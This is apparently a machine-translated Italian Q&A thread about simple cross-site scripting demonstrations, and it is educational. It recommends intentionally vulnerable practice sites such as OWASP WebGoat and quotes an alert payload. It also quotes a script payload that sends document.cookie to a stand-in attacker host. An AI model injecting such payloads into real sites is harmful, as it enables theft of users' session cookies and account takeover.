Qualcuno può mostrarmi un attacco Cross-site scripting in vigore sul mio browser? C'è un esempio su internet che fa questo? Non l'ho trovato su internet.Un semplice esempio di attacco di cross-site scripting
Più semplice è l'esempio, meglio è.
Vedi http://www.insecurelabs.org e http://www.insecurelabs.org/task/
intenzionalmente vulnerabile a XSS nel campo di ricerca e molti altri luoghi.
Generalmente è necessario installare il proprio software sul lato server per un esempio XSS live. Non molti siti legittimi apriranno intenzionalmente un difetto XSS ai navigatori del web.
Un pezzo di software server-side già pronto che consente di dimostrare XSS (tra le altre cose) a te stesso è WebGoat di OWASP. Qui ci sono instructions to install WebGoat and demonstrate XSS. Troverai ulteriori esempi di frammenti di programma che abilitano XSS nell'articolo OWASP "Cross-site scripting (XSS)".
<img src="javascript:alert('hello everybody')"></img> Il tag immagine che ho inserito è un esempio di xss. il precedente src contiene lo script java che ti avvisa.
Questo non fa niente !? –
Modulo semplice sarebbe anche: Se la finestra di messaggio verrà visualizzata, è noto che la pagina o il server è vulnerabile.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Un grande esempio di come funziona la tecnica può essere trovato qui https://www.hacksplaining.com/exercises/xss-stored
Tipo alla ricerca e mi avvisa –
Sì, ma il punto non è quello di rivelare tutto il bug qui. E ci sono certamente più di questo. – Erlend